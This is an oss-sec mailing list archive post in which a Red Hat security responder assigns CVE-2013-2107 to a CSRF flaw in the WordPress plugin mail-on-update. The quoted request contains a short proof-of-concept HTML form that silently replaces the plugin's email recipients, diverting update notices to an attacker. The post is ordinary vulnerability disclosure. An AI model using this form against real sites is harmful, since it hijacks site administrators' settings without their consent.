oss-sec mailing list archives
Re: CVE request: WordPress plugin mail-on-update CSRF
From: Kurt Seifried <kseifried () redhat com>
Date: Sat, 18 May 2013 00:58:07 -0600
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 05/16/2013 08:06 AM, Henri Salo wrote:
Hello, Can I get 2013 CVE for WordPress plugin mail-on-update CSRF vulnerability. PoC for "List of alternative recipients" below. Tested 5.1.0 version. Homepage: http://wordpress.org/extend/plugins/mail-on-update/ Code: http://plugins.svn.wordpress.org/mail-on-update/trunk/ <html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update"; method="post" class="buttom-primary"> <input name="mailonupdate_mailto" type="hidden" value="example0 () example com example1 () example com example2 () example com example3 () example com example4 () example com example5 () example com example6 () example com example7 () example com example8 () example com example9 () example com example10 () example com henri+monkey () nerv fi" /> <input name="submit" type="submit" value="Save"/></form></html> If attacker adds random email to that form default user won't get emails and attacker might be interested to receive these as the email contains information of available plugin updates. --- Henri Salo
Even better the remote site then notifies you when it becomes vulnerable to a security flaw, or you can use it to spam people, or all sorts of other annoying things. Please use CVE-2013-2107 for this issue. - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iQIcBAEBAgAGBQJRlyZ/AAoJEBYNRVNeJnmT7pkP/iDGTI3Jf3aAHTDUQgPUZ/ZO TCd9EYDghNiaFiW6pFjbLejoJ77Fg5md4tZ2Y0sFtgyYjL/4pZnlW/lGthVDCgr3 KvJmuibB2PpHC51JDKxX+lzeYhyW1wY8zAx0Vz64+NAyGebbsaSAkPrl4ry1WKtK zBJQn+zDPVrqBHhzXeVd+Fstvk5xI3SQdOJWZFG0fbperH9+GTwJChlOVLkHt5IJ FvzPHm13KBRhI0FSvcFbKKgaxaSD6yznPfsvV8+dHnffHiGqrtizFiRHvWSdIv/r QypYQyEkBta/z8OKNO9Q1hQlGynT2YT1AGrDwr8efKqeL5k/9kawS4y+Y524iouN 7JWj/OV3kfldxJy1Sak2z73FUqhBVEZQ+/hoH7dxR0PIzWRK6DjrZJZfS6D0KDDV GI6Mqlxg13FrYa128lBfdHK+WaFbB1jhQMN4xQfuk4d/9ni3lmUSsTVpsCZU3X3W lgGCyICVEWva660Pg9iz7BRebd4BwxROivMYCXQTXKBF0nyZ6MZoCdXIktEpET/G YBojmgWRh/tf0Os9mIDei17w/seDlTSJuRiV+yEKYETucZD7YfMEA7pEjfnSDjjy rsoxr3O226i8drZaFUu8a4Xb4dY49SHSHiPmh+mcdtwPnaEgBcj3Nr3xSyi4QG8S d6mzTmdY1YMHK7yJ33Ft =VKrq -----END PGP SIGNATURE-----
Current thread:
- CVE request: WordPress plugin mail-on-update CSRF Henri Salo (May 16)
- Re: CVE request: WordPress plugin mail-on-update CSRF Kurt Seifried (May 18)